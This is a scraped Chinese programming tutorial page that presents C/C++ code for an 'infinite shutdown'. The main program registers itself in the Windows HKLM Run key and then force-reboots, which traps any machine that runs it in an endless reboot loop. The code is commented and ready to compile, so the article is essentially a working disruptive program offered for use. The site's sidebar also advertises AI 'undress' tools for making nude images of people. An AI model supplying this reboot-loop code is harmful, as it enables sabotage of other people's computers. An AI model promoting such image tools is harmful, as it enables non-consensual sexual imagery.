Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home Backend Development C#.Net Tutorial C/C++ infinite shutdown (privilege escalation example)

C/C++ infinite shutdown (privilege escalation example)

黄舟
黄舟
Jan 22, 2017 pm 02:23 PM

在windows系统中,当涉及本进程去操作其他进程,或者要用shutdown这些高危命令的时候就涉及提权,下面是MSDN的列子

提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges

C/C++ infinite shutdown (privilege escalation example)

我们用下面这个MSDN的代码来做一个注册表无限关机的列子

#include <windows.h>  
  
#pragma comment(lib, "user32.lib")  
#pragma comment(lib, "advapi32.lib")  
  
BOOL MySystemShutdown()  
{  
   HANDLE hToken;   
   TOKEN_PRIVILEGES tkp;   
   
   // Get a token for this process.   
   
   if (!OpenProcessToken(GetCurrentProcess(),   
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))   
      return( FALSE );   
   
   // Get the LUID for the shutdown privilege.   
   
   LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,   
        &tkp.Privileges[0].Luid);   
   
   tkp.PrivilegeCount = 1;  // one privilege to set      
   tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;   
   
   // Get the shutdown privilege for this process.   
   
   AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,   
        (PTOKEN_PRIVILEGES)NULL, 0);   
   
   if (GetLastError() != ERROR_SUCCESS)   
      return FALSE;   
   
   // Shut down the system and force all applications to close.   
   
   if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,   
               SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
               SHTDN_REASON_MINOR_UPGRADE |  
               SHTDN_REASON_FLAG_PLANNED))   
      return FALSE;   
  
   //shutdown was successful  
   return TRUE;  
}
Copy after login

上面是MSDN的代码,下面给出无限关机的代码(含详细注释)

// shutdownDemo.cpp : 定义控制台应用程序的入口点。  
//  
  
#include "stdafx.h"  
#include <windows.h>  
  
BOOL MySystemShutdown()  
{  
    HANDLE hToken;      //用于操作的句柄  
    TOKEN_PRIVILEGES tkp;   //用于存放特定信息  
  
    // Get a token for this process.   
  
    if (!OpenProcessToken(GetCurrentProcess(),  
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))  
        return(FALSE);  
  
    // Get the LUID for the shutdown privilege.   
    //如果要提权的话要在下面这两个函数提权  
  
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,  
        &tkp.Privileges[0].Luid);  
  
    tkp.PrivilegeCount = 1;  // one privilege to set      
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
  
    // Get the shutdown privilege for this process.       
  
  
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,  
        (PTOKEN_PRIVILEGES)NULL, 0);  
  
    if (GetLastError() != ERROR_SUCCESS)  
        return FALSE;  
  
    // Shut down the system and force all applications to close.   
  
    if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,  
        SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
        SHTDN_REASON_MINOR_UPGRADE |  
        SHTDN_REASON_FLAG_PLANNED))  
        return FALSE;  
  
    //shutdown was successful  
    return TRUE;  
}  
  
  
int _tmain(int argc, _TCHAR* argv[])  
{  
    getchar();  
    HKEY hKey = { 0 };  
  
    /*LONG RegOpenKeyEx( 
        HKEY hKey, // 需要打开的主键的名称 
        LPCTSTR lpSubKey, //需要打开的子键的名称 
        DWORD ulOptions, // 保留,设为0 
        REGSAM samDesired, // 安全访问标记,也就是权限 
        PHKEY phkResult // 得到的将要打开键的句柄 
        )*/  
  
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey);    //打开一个指定的注册表键  
    char path[MAX_PATH] = { 0 };  
    GetModuleFileNameA(nullptr, path, MAX_PATH);    //获取当前文件路径  
  
    RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));  
    MySystemShutdown();  
    return 0;  
}
Copy after login

如果出现下面问题

C/C++ infinite shutdown (privilege escalation example)

请修改字符集如下

C/C++ infinite shutdown (privilege escalation example)

下面看看运行结果!


C/C++ infinite shutdown (privilege escalation example)

以上就是 C/C++无限关机(提权例子)的内容,更多相关内容请关注PHP中文网(www.php.cn)!

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Show More

Hot Article

How to fix KB5055612 fails to install in Windows 10?
3 weeks ago By DDD
Roblox: Grow A Garden - Complete Mutation Guide
3 weeks ago By DDD
Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Nordhold: Fusion System, Explained
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Mandragora: Whispers Of The Witch Tree - How To Unlock The Grappling Hook
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Show More

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Show More

Hot Topics

Java Tutorial
1667
14
CakePHP Tutorial
1426
52
Laravel Tutorial
1328
25
PHP Tutorial
1273
29
C# Tutorial
1255
24
Show More
Related knowledge
The Continued Relevance of C# .NET: A Look at Current Usage The Continued Relevance of C# .NET: A Look at Current Usage Apr 16, 2025 am 12:07 AM

C#.NET is still important because it provides powerful tools and libraries that support multiple application development. 1) C# combines .NET framework to make development efficient and convenient. 2) C#'s type safety and garbage collection mechanism enhance its advantages. 3) .NET provides a cross-platform running environment and rich APIs, improving development flexibility.

From Web to Desktop: The Versatility of C# .NET From Web to Desktop: The Versatility of C# .NET Apr 15, 2025 am 12:07 AM

C#.NETisversatileforbothwebanddesktopdevelopment.1)Forweb,useASP.NETfordynamicapplications.2)Fordesktop,employWindowsFormsorWPFforrichinterfaces.3)UseXamarinforcross-platformdevelopment,enablingcodesharingacrossWindows,macOS,Linux,andmobiledevices.

Is C# .NET Right for You? Evaluating its Applicability Is C# .NET Right for You? Evaluating its Applicability Apr 13, 2025 am 12:03 AM

C#.NETissuitableforenterprise-levelapplicationswithintheMicrosoftecosystemduetoitsstrongtyping,richlibraries,androbustperformance.However,itmaynotbeidealforcross-platformdevelopmentorwhenrawspeediscritical,wherelanguageslikeRustorGomightbepreferable.

C# as a Versatile .NET Language: Applications and Examples C# as a Versatile .NET Language: Applications and Examples Apr 26, 2025 am 12:26 AM

C# is widely used in enterprise-level applications, game development, mobile applications and web development. 1) In enterprise-level applications, C# is often used for ASP.NETCore to develop WebAPI. 2) In game development, C# is combined with the Unity engine to realize role control and other functions. 3) C# supports polymorphism and asynchronous programming to improve code flexibility and application performance.

C# .NET and the Future: Adapting to New Technologies C# .NET and the Future: Adapting to New Technologies Apr 14, 2025 am 12:06 AM

C# and .NET adapt to the needs of emerging technologies through continuous updates and optimizations. 1) C# 9.0 and .NET5 introduce record type and performance optimization. 2) .NETCore enhances cloud native and containerized support. 3) ASP.NETCore integrates with modern web technologies. 4) ML.NET supports machine learning and artificial intelligence. 5) Asynchronous programming and best practices improve performance.

Deploying C# .NET Applications to Azure/AWS: A Step-by-Step Guide Deploying C# .NET Applications to Azure/AWS: A Step-by-Step Guide Apr 23, 2025 am 12:06 AM

How to deploy a C# .NET app to Azure or AWS? The answer is to use AzureAppService and AWSElasticBeanstalk. 1. On Azure, automate deployment using AzureAppService and AzurePipelines. 2. On AWS, use Amazon ElasticBeanstalk and AWSLambda to implement deployment and serverless compute.

C# and the .NET Runtime: How They Work Together C# and the .NET Runtime: How They Work Together Apr 19, 2025 am 12:04 AM

C# and .NET runtime work closely together to empower developers to efficient, powerful and cross-platform development capabilities. 1) C# is a type-safe and object-oriented programming language designed to integrate seamlessly with the .NET framework. 2) The .NET runtime manages the execution of C# code, provides garbage collection, type safety and other services, and ensures efficient and cross-platform operation.

C# and .NET: Understanding the Relationship Between the Two C# and .NET: Understanding the Relationship Between the Two Apr 17, 2025 am 12:07 AM

The relationship between C# and .NET is inseparable, but they are not the same thing. C# is a programming language, while .NET is a development platform. C# is used to write code, compile into .NET's intermediate language (IL), and executed by the .NET runtime (CLR).

See all articles